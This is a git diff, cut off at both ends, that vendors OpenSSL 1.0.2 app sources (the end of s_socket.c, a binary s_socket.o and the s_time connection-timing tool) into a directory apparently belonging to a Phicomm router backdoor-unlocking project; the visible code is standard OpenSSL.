+        i = WSAGetLastError();
+        BIO_printf(bio_err, "accept error %d\n", i);
+# else
+        if (errno == EINTR) {
+            /*
+             * check_timeout();
+             */
+            goto redoit;
+        }
+        fprintf(stderr, "errno=%d ", errno);
+        perror("accept");
+# endif
+        return (0);
+    }
+
+/*-
+    ling.l_onoff=1;
+    ling.l_linger=0;
+    i=setsockopt(ret,SOL_SOCKET,SO_LINGER,(char *)&ling,sizeof(ling));
+    if (i < 0) { perror("linger"); return(0); }
+    i=0;
+    i=setsockopt(ret,SOL_SOCKET,SO_KEEPALIVE,(char *)&i,sizeof(i));
+    if (i < 0) { perror("keepalive"); return(0); }
+*/
+
+    if (host == NULL)
+        goto end;
+# ifndef BIT_FIELD_LIMITS
+    /* I should use WSAAsyncGetHostByName() under windows */
+    h1 = gethostbyaddr((char *)&from.sin_addr.s_addr,
+                       sizeof(from.sin_addr.s_addr), AF_INET);
+# else
+    h1 = gethostbyaddr((char *)&from.sin_addr,
+                       sizeof(struct in_addr), AF_INET);
+# endif
+    if (h1 == NULL) {
+        BIO_printf(bio_err, "bad gethostbyaddr\n");
+        *host = NULL;
+        /* return(0); */
+    } else {
+        if ((*host = (char *)OPENSSL_malloc(strlen(h1->h_name) + 1)) == NULL) {
+            perror("OPENSSL_malloc");
+            closesocket(ret);
+            return (0);
+        }
+        BUF_strlcpy(*host, h1->h_name, strlen(h1->h_name) + 1);
+
+        h2 = GetHostByName(*host);
+        if (h2 == NULL) {
+            BIO_printf(bio_err, "gethostbyname failure\n");
+            closesocket(ret);
+            return (0);
+        }
+        if (h2->h_addrtype != AF_INET) {
+            BIO_printf(bio_err, "gethostbyname addr is not AF_INET\n");
+            closesocket(ret);
+            return (0);
+        }
+    }
+ end:
+    *sock = ret;
+    return (1);
+}
+
+int extract_host_port(char *str, char **host_ptr, unsigned char *ip,
+                      short *port_ptr)
+{
+    char *h, *p;
+
+    h = str;
+    p = strchr(str, ':');
+    if (p == NULL) {
+        BIO_printf(bio_err, "no port defined\n");
+        return (0);
+    }
+    *(p++) = '\0';
+
+    if ((ip != NULL) && !host_ip(str, ip))
+        goto err;
+    if (host_ptr != NULL)
+        *host_ptr = h;
+
+    if (!extract_port(p, port_ptr))
+        goto err;
+    return (1);
+ err:
+    return (0);
+}
+
+static int host_ip(char *str, unsigned char ip[4])
+{
+    unsigned int in[4];
+    int i;
+
+    if (sscanf(str, "%u.%u.%u.%u", &(in[0]), &(in[1]), &(in[2]), &(in[3])) ==
+        4) {
+        for (i = 0; i < 4; i++)
+            if (in[i] > 255) {
+                BIO_printf(bio_err, "invalid IP address\n");
+                goto err;
+            }
+        ip[0] = in[0];
+        ip[1] = in[1];
+        ip[2] = in[2];
+        ip[3] = in[3];
+    } else {                    /* do a gethostbyname */
+        struct hostent *he;
+
+        if (!ssl_sock_init())
+            return (0);
+
+        he = GetHostByName(str);
+        if (he == NULL) {
+            BIO_printf(bio_err, "gethostbyname failure\n");
+            goto err;
+        }
+        /* cast to short because of win16 winsock definition */
+        if ((short)he->h_addrtype != AF_INET) {
+            BIO_printf(bio_err, "gethostbyname addr is not AF_INET\n");
+            return (0);
+        }
+        ip[0] = he->h_addr_list[0][0];
+        ip[1] = he->h_addr_list[0][1];
+        ip[2] = he->h_addr_list[0][2];
+        ip[3] = he->h_addr_list[0][3];
+    }
+    return (1);
+ err:
+    return (0);
+}
+
+int extract_port(char *str, short *port_ptr)
+{
+    int i;
+    struct servent *s;
+
+    i = atoi(str);
+    if (i != 0)
+        *port_ptr = (unsigned short)i;
+    else {
+        s = getservbyname(str, "tcp");
+        if (s == NULL) {
+            BIO_printf(bio_err, "getservbyname failure for %s\n", str);
+            return (0);
+        }
+        *port_ptr = ntohs((unsigned short)s->s_port);
+    }
+    return (1);
+}
+
+# define GHBN_NUM        4
+static struct ghbn_cache_st {
+    char name[128];
+    struct hostent ent;
+    unsigned long order;
+} ghbn_cache[GHBN_NUM];
+
+static unsigned long ghbn_hits = 0L;
+static unsigned long ghbn_miss = 0L;
+
+static struct hostent *GetHostByName(char *name)
+{
+    struct hostent *ret;
+    int i, lowi = 0;
+    unsigned long low = (unsigned long)-1;
+
+    for (i = 0; i < GHBN_NUM; i++) {
+        if (low > ghbn_cache[i].order) {
+            low = ghbn_cache[i].order;
+            lowi = i;
+        }
+        if (ghbn_cache[i].order > 0) {
+            if (strncmp(name, ghbn_cache[i].name, 128) == 0)
+                break;
+        }
+    }
+    if (i == GHBN_NUM) {        /* no hit */
+        ghbn_miss++;
+        ret = gethostbyname(name);
+        if (ret == NULL)
+            return (NULL);
+        /* else add to cache */
+        if (strlen(name) < sizeof ghbn_cache[0].name) {
+            strcpy(ghbn_cache[lowi].name, name);
+            memcpy((char *)&(ghbn_cache[lowi].ent), ret,
+                   sizeof(struct hostent));
+            ghbn_cache[lowi].order = ghbn_miss + ghbn_hits;
+        }
+        return (ret);
+    } else {
+        ghbn_hits++;
+        ret = &(ghbn_cache[i].ent);
+        ghbn_cache[i].order = ghbn_miss + ghbn_hits;
+        return (ret);
+    }
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_socket.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_socket.o
new file mode 100644
index 0000000000000000000000000000000000000000..49a9c4b17e511e25e675942aaf3f76f73f68968d
GIT binary patch
literal 7992
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_time.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_time.c
new file mode 100644
index 0000000..5846f3a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_time.c
@@ -0,0 +1,636 @@
+/* apps/s_time.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#define NO_SHUTDOWN
+
+/* ----------------------------------------
+   s_time - SSL client connection timer program
+   Written and donated by Larry Streepy <streepy@healthcare.com>
+  -----------------------------------------*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define USE_SOCKETS
+#include "apps.h"
+#ifdef OPENSSL_NO_STDIO
+# define APPS_WIN16
+#endif
+#include <openssl/x509.h>
+#include <openssl/ssl.h>
+#include <openssl/pem.h>
+#include "s_apps.h"
+#include <openssl/err.h>
+#ifdef WIN32_STUFF
+# include "winmain.h"
+# include "wintext.h"
+#endif
+#if !defined(OPENSSL_SYS_MSDOS)
+# include OPENSSL_UNISTD
+#endif
+
+#undef PROG
+#define PROG s_time_main
+
+#undef ioctl
+#define ioctl ioctlsocket
+
+#define SSL_CONNECT_NAME        "localhost:4433"
+
+/* no default cert. */
+/*
+ * #define TEST_CERT "client.pem"
+ */
+
+#undef BUFSIZZ
+#define BUFSIZZ 1024*10
+
+#define MYBUFSIZ 1024*8
+
+#undef min
+#undef max
+#define min(a,b) (((a) < (b)) ? (a) : (b))
+#define max(a,b) (((a) > (b)) ? (a) : (b))
+
+#undef SECONDS
+#define SECONDS 30
+extern int verify_depth;
+extern int verify_error;
+
+static void s_time_usage(void);
+static int parseArgs(int argc, char **argv);
+static SSL *doConnection(SSL *scon);
+static void s_time_init(void);
+
+/***********************************************************************
+ * Static data declarations
+ */
+
+/* static char *port=PORT_STR;*/
+static char *host = SSL_CONNECT_NAME;
+static char *t_cert_file = NULL;
+static char *t_key_file = NULL;
+static char *CApath = NULL;
+static char *CAfile = NULL;
+static char *tm_cipher = NULL;
+static int tm_verify = SSL_VERIFY_NONE;
+static int maxTime = SECONDS;
+static SSL_CTX *tm_ctx = NULL;
+static const SSL_METHOD *s_time_meth = NULL;
+static char *s_www_path = NULL;
+static long bytes_read = 0;
+static int st_bugs = 0;
+static int perform = 0;
+#ifdef FIONBIO
+static int t_nbio = 0;
+#endif
+#ifdef OPENSSL_SYS_WIN32
+static int exitNow = 0;         /* Set when it's time to exit main */
+#endif
+
+static void s_time_init(void)
+{
+    host = SSL_CONNECT_NAME;
+    t_cert_file = NULL;
+    t_key_file = NULL;
+    CApath = NULL;
+    CAfile = NULL;
+    tm_cipher = NULL;
+    tm_verify = SSL_VERIFY_NONE;
+    maxTime = SECONDS;
+    tm_ctx = NULL;
+    s_time_meth = NULL;
+    s_www_path = NULL;
+    bytes_read = 0;
+    st_bugs = 0;
+    perform = 0;
+
+#ifdef FIONBIO
+    t_nbio = 0;
+#endif
+#ifdef OPENSSL_SYS_WIN32
+    exitNow = 0;                /* Set when it's time to exit main */
+#endif
+}
+
+/***********************************************************************
+ * usage - display usage message
+ */
+static void s_time_usage(void)
+{
+    static char umsg[] = "\
+-time arg     - max number of seconds to collect data, default %d\n\
+-verify arg   - turn on peer certificate verification, arg == depth\n\
+-cert arg     - certificate file to use, PEM format assumed\n\
+-key arg      - RSA file to use, PEM format assumed, key is in cert file\n\
+                file if not specified by this option\n\
+-CApath arg   - PEM format directory of CA's\n\
+-CAfile arg   - PEM format file of CA's\n\
+-cipher       - preferred cipher to use, play with 'openssl ciphers'\n\n";
+
+    printf("usage: s_time <args>\n\n");
+
+    printf("-connect host:port - host:port to connect to (default is %s)\n",
+           SSL_CONNECT_NAME);
+#ifdef FIONBIO
+    printf("-nbio         - Run with non-blocking IO\n");
+    printf("-ssl2         - Just use SSLv2\n");
+    printf("-ssl3         - Just use SSLv3\n");
+    printf("-bugs         - Turn on SSL bug compatibility\n");
+    printf("-new          - Just time new connections\n");
+    printf("-reuse        - Just time connection reuse\n");
+    printf("-www page     - Retrieve 'page' from the site\n");
+#endif
+    printf(umsg, SECONDS);
+}
+
+/***********************************************************************
+ * parseArgs - Parse command line arguments and initialize data
+ *
+ * Returns 0 if ok, -1 on bad args
+ */
+static int parseArgs(int argc, char **argv)
+{
+    int badop = 0;
+
+    verify_depth = 0;
+    verify_error = X509_V_OK;
+
+    argc--;
+    argv++;
+
+    while (argc >= 1) {
+        if (strcmp(*argv, "-connect") == 0) {
+            if (--argc < 1)
+                goto bad;
+            host = *(++argv);
+        }
+#if 0
+        else if (strcmp(*argv, "-host") == 0) {
+            if (--argc < 1)
+                goto bad;
+            host = *(++argv);
+        } else if (strcmp(*argv, "-port") == 0) {
+            if (--argc < 1)
+                goto bad;
+            port = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-reuse") == 0)
+            perform = 2;
+        else if (strcmp(*argv, "-new") == 0)
+            perform = 1;
+        else if (strcmp(*argv, "-verify") == 0) {
+
+            tm_verify = SSL_VERIFY_PEER | SSL_VERIFY_CLIENT_ONCE;
+            if (--argc < 1)
+                goto bad;
+            verify_depth = atoi(*(++argv));
+            BIO_printf(bio_err, "verify depth is %d\n", verify_depth);
+
+        } else if (strcmp(*argv, "-cert") == 0) {
+
+            if (--argc < 1)
+                goto bad;
+            t_cert_file = *(++argv);
+
+        } else if (strcmp(*argv, "-key") == 0) {
+
+            if (--argc < 1)
+                goto bad;
+            t_key_file = *(++argv);
+
+        } else if (strcmp(*argv, "-CApath") == 0) {
+
+            if (--argc < 1)
+                goto bad;
+            CApath = *(++argv);
+
+        } else if (strcmp(*argv, "-CAfile") == 0) {
+
+            if (--argc < 1)
+                goto bad;
+            CAfile = *(++argv);
+
+        } else if (strcmp(*argv, "-cipher") == 0) {
+
+            if (--argc < 1)
+                goto bad;
+            tm_cipher = *(++argv);
+        }
+#ifdef FIONBIO
+        else if (strcmp(*argv, "-nbio") == 0) {
+            t_nbio = 1;
+        }
+#endif
+        else if (strcmp(*argv, "-www") == 0) {
+            if (--argc < 1)
+                goto bad;
+            s_www_path = *(++argv);
+            if (strlen(s_www_path) > MYBUFSIZ - 100) {
+                BIO_printf(bio_err, "-www option too long\n");
+                badop = 1;
+            }
+        } else if (strcmp(*argv, "-bugs") == 0)
+            st_bugs = 1;
+#ifndef OPENSSL_NO_SSL2
+        else if (strcmp(*argv, "-ssl2") == 0)
+            s_time_meth = SSLv2_client_method();
+#endif
+#ifndef OPENSSL_NO_SSL3
+        else if (strcmp(*argv, "-ssl3") == 0)
+            s_time_meth = SSLv3_client_method();
+#endif
+        else if (strcmp(*argv, "-time") == 0) {
+
+            if (--argc < 1)
+                goto bad;
+            maxTime = atoi(*(++argv));
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badop = 1;
+            break;
+        }
+
+        argc--;
+        argv++;
+    }
+
+    if (perform == 0)
+        perform = 3;
+
+    if (badop) {
+ bad:
+        s_time_usage();
+        return -1;
+    }
+
+    return 0;                   /* Valid args */
+}
+
+/***********************************************************************
+ * TIME - time functions
+ */
+#define START   0
+#define STOP    1
+
+static double tm_Time_F(int s)
+{
+    return app_tminterval(s, 1);
+}
+
+/***********************************************************************
+ * MAIN - main processing area for client
+ *                      real name depends on MONOLITH
+ */
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    double totalTime = 0.0;
+    int nConn = 0;
+    SSL *scon = NULL;
+    long finishtime = 0;
+    int ret = 1, i;
+    MS_STATIC char buf[1024 * 8];
+    int ver;
+
+    apps_startup();
+    s_time_init();
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    s_time_meth = SSLv23_client_method();
+
+    /* parse the command line arguments */
+    if (parseArgs(argc, argv) < 0)
+        goto end;
+
+    OpenSSL_add_ssl_algorithms();
+    if ((tm_ctx = SSL_CTX_new(s_time_meth)) == NULL)
+        return (1);
+
+    SSL_CTX_set_quiet_shutdown(tm_ctx, 1);
+
+    if (st_bugs)
+        SSL_CTX_set_options(tm_ctx, SSL_OP_ALL);
+    SSL_CTX_set_cipher_list(tm_ctx, tm_cipher);
+    if (!set_cert_stuff(tm_ctx, t_cert_file, t_key_file))
+        goto end;
+
+    SSL_load_error_strings();
+
+    if ((!SSL_CTX_load_verify_locations(tm_ctx, CAfile, CApath)) ||
+        (!SSL_CTX_set_default_verify_paths(tm_ctx))) {
+        /*
+         * BIO_printf(bio_err,"error setting default verify locations\n");
+         */
+        ERR_print_errors(bio_err);
+        /* goto end; */
+    }
+
+    if (tm_cipher == NULL)
+        tm_cipher = getenv("SSL_CIPHER");
+
+    if (tm_cipher == NULL) {
+        fprintf(stderr, "No CIPHER specified\n");
+    }
+
+    if (!(perform & 1))
+        goto next;
+    printf("Collecting connection statistics for %d seconds\n", maxTime);
+
+    /* Loop and time how long it takes to make connections */
+
+    bytes_read = 0;
+    finishtime = (long)time(NULL) + maxTime;
+    tm_Time_F(START);
+    for (;;) {
+        if (finishtime < (long)time(NULL))
+            break;
+#ifdef WIN32_STUFF
+
+        if (flushWinMsgs(0) == -1)
+            goto end;
+
+        if (waitingToDie || exitNow) /* we're dead */
+            goto end;
+#endif
+
+        if ((scon = doConnection(NULL)) == NULL)
+            goto end;
+
+        if (s_www_path != NULL) {
+            BIO_snprintf(buf, sizeof buf, "GET %s HTTP/1.0\r\n\r\n",
+                         s_www_path);
+            SSL_write(scon, buf, strlen(buf));
+            while ((i = SSL_read(scon, buf, sizeof(buf))) > 0)
+                bytes_read += i;
+        }
+#ifdef NO_SHUTDOWN
+        SSL_set_shutdown(scon, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+#else
+        SSL_shutdown(scon);
+#endif
+        SHUTDOWN2(SSL_get_fd(scon));
+
+        nConn += 1;
+        if (SSL_session_reused(scon))
+            ver = 'r';
+        else {
+            ver = SSL_version(scon);
+            if (ver == TLS1_VERSION)
+                ver = 't';
+            else if (ver == SSL3_VERSION)
+                ver = '3';
+            else if (ver == SSL2_VERSION)
+                ver = '2';
+            else
+                ver = '*';
+        }
+        fputc(ver, stdout);
+        fflush(stdout);
+
+        SSL_free(scon);
+        scon = NULL;
+    }
+    totalTime += tm_Time_F(STOP); /* Add the time for this iteration */
+
+    i = (int)((long)time(NULL) - finishtime + maxTime);
+    printf
+        ("\n\n%d connections in %.2fs; %.2f connections/user sec, bytes read %ld\n",
+         nConn, totalTime, ((double)nConn / totalTime), bytes_read);
+    printf
+        ("%d connections in %ld real seconds, %ld bytes read per connection\n",
+         nConn, (long)time(NULL) - finishtime + maxTime, bytes_read / nConn);
+
+    /*
+     * Now loop and time connections using the same session id over and over
+     */
+
+ next:
+    if (!(perform & 2))
+        goto end;
+    printf("\n\nNow timing with session id reuse.\n");
+
+    /* Get an SSL object so we can reuse the session id */
+    if ((scon = doConnection(NULL)) == NULL) {
+        fprintf(stderr, "Unable to get connection\n");
+        goto end;
+    }
+
+    if (s_www_path != NULL) {
+        BIO_snprintf(buf, sizeof buf, "GET %s HTTP/1.0\r\n\r\n", s_www_path);
+        SSL_write(scon, buf, strlen(buf));
+        while (SSL_read(scon, buf, sizeof(buf)) > 0) ;
+    }
+#ifdef NO_SHUTDOWN
+    SSL_set_shutdown(scon, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+#else
+    SSL_shutdown(scon);
+#endif
+    SHUTDOWN2(SSL_get_fd(scon));
+
+    nConn = 0;
+    totalTime = 0.0;
+
+    finishtime = (long)time(NULL) + maxTime;
+
+    printf("starting\n");
+    bytes_read = 0;
+    tm_Time_F(START);
+
+    for (;;) {
+        if (finishtime < (long)time(NULL))
+            break;
+
+#ifdef WIN32_STUFF
+        if (flushWinMsgs(0) == -1)
+            goto end;
+
+        if (waitingToDie || exitNow) /* we're dead */
+            goto end;
+#endif
+
+        if ((doConnection(scon)) == NULL)
+            goto end;
+
+        if (s_www_path) {
+            BIO_snprintf(buf, sizeof buf, "GET %s HTTP/1.0\r\n\r\n",
+                         s_www_path);
+            SSL_write(scon, buf, strlen(buf));
+            while ((i = SSL_read(scon, buf, sizeof(buf))) > 0)
+                bytes_read += i;
+        }
+#ifdef NO_SHUTDOWN
+        SSL_set_shutdown(scon, SSL_SENT_SHUTDOWN | SSL_RECEIVED_SHUTDOWN);
+#else
+        SSL_shutdown(scon);
+#endif
+        SHUTDOWN2(SSL_get_fd(scon));
+
+        nConn += 1;
+        if (SSL_session_reused(scon))
+            ver = 'r';
+        else {
+            ver = SSL_version(scon);
+            if (ver == TLS1_VERSION)
+                ver = 't';
+            else if (ver == SSL3_VERSION)
+                ver = '3';
+            else if (ver == SSL2_VERSION)
+                ver = '2';
+            else
+                ver = '*';
+        }
+        fputc(ver, stdout);
+        fflush(stdout);
+    }
+    totalTime += tm_Time_F(STOP); /* Add the time for this iteration */
+
+    printf
+        ("\n\n%d connections in %.2fs; %.2f connections/user sec, bytes read %ld\n",
+         nConn, totalTime, ((double)nConn / totalTime), bytes_read);
+    printf
+        ("%d connections in %ld real seconds, %ld bytes read per connection\n",
+         nConn, (long)time(NULL) - finishtime + maxTime, bytes_read / nConn);
+
+    ret = 0;
+ end:
+    if (scon != NULL)
+        SSL_free(scon);
+
+    if (tm_ctx != NULL) {
+        SSL_CTX_free(tm_ctx);
+        tm_ctx = NULL;
+    }
